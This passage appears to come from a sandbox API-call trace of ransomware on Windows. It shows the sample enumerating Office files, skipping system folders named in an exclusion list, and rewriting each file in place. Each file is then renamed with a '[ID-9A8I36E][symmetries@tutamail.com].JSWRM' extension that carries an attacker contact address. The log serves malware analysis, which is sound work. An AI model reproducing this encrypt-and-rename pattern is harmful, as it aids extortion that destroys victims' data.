hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0121.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0121.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0121.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.418] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\space.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPACE.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\space.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0121.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0121.419] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4770c42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4770c42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4770c42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SPRING.CSS", cAlternateFileName="")) returned 1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2=".") returned 1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2="..") returned 1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2="...") returned 1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2="windows") returned -1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2="recovery") returned 1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2="perflogs") returned 1 [0121.419] lstrcmpiW (lpString1="SPRING.CSS", lpString2="documents and settings") returned 1 [0121.420] lstrcmpiW (lpString1="SPRING.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.420] lstrcmpiW (lpString1="SPRING.CSS", lpString2="system volume information") returned -1 [0121.420] lstrcmpiW (lpString1="SPRING.CSS", lpString2="msocache") returned 1 [0121.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0121.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRING.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRING.CSS", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPRING.CSS", lpUsedDefaultChar=0x0) returned 10 [0121.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0121.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRING.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRING.CSS", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPRING.CSS", lpUsedDefaultChar=0x0) returned 10 [0121.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0121.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0121.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0121.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPRING.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\spring.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.421] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0121.421] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.421] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.422] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.422] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.423] CloseHandle (hObject=0x238) returned 1 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0121.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0121.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0121.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.423] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPRING.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\spring.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPRING.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\spring.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0121.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0121.424] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4770c42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4770c42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4770c42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SPS.CSS", cAlternateFileName="")) returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2=".") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="..") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="...") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="windows") returned -1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="recovery") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="perflogs") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="documents and settings") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="system volume information") returned -1 [0121.424] lstrcmpiW (lpString1="SPS.CSS", lpString2="msocache") returned 1 [0121.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPS.CSS", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0121.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPS.CSS", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPS.CSS", lpUsedDefaultChar=0x0) returned 7 [0121.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPS.CSS", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0121.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPS.CSS", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPS.CSS", lpUsedDefaultChar=0x0) returned 7 [0121.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0121.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0121.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0121.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPS.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sps.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.426] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3452) returned 1 [0121.426] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.426] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.427] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.427] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.427] CloseHandle (hObject=0x238) returned 1 [0121.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0121.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0121.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0121.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0121.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0121.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.428] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPS.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sps.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPS.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sps.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0121.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0121.429] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4770c42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4770c42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4770c42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="STEEL.CSS", cAlternateFileName="")) returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2=".") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="..") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="...") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="windows") returned -1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="recovery") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="perflogs") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="documents and settings") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="$RECYCLE.BIN") returned 1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="system volume information") returned -1 [0121.429] lstrcmpiW (lpString1="STEEL.CSS", lpString2="msocache") returned 1 [0121.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STEEL.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STEEL.CSS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STEEL.CSS", lpUsedDefaultChar=0x0) returned 9 [0121.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0121.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STEEL.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STEEL.CSS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STEEL.CSS", lpUsedDefaultChar=0x0) returned 9 [0121.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0121.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0121.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0121.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0121.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STEEL.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\steel.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.430] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0121.430] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.430] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.433] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.433] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.433] CloseHandle (hObject=0x238) returned 1 [0121.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0121.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0121.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0121.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0121.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0121.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STEEL.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\steel.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STEEL.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\steel.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0121.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0121.434] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69d1a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="STSLIST.CHM", cAlternateFileName="")) returned 1 [0121.434] lstrcmpiW (lpString1="STSLIST.CHM", lpString2=".") returned 1 [0121.434] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="..") returned 1 [0121.434] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="...") returned 1 [0121.434] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="windows") returned -1 [0121.434] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="recovery") returned 1 [0121.434] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="perflogs") returned 1 [0121.435] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="documents and settings") returned 1 [0121.435] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="$RECYCLE.BIN") returned 1 [0121.435] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="system volume information") returned -1 [0121.435] lstrcmpiW (lpString1="STSLIST.CHM", lpString2="msocache") returned 1 [0121.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 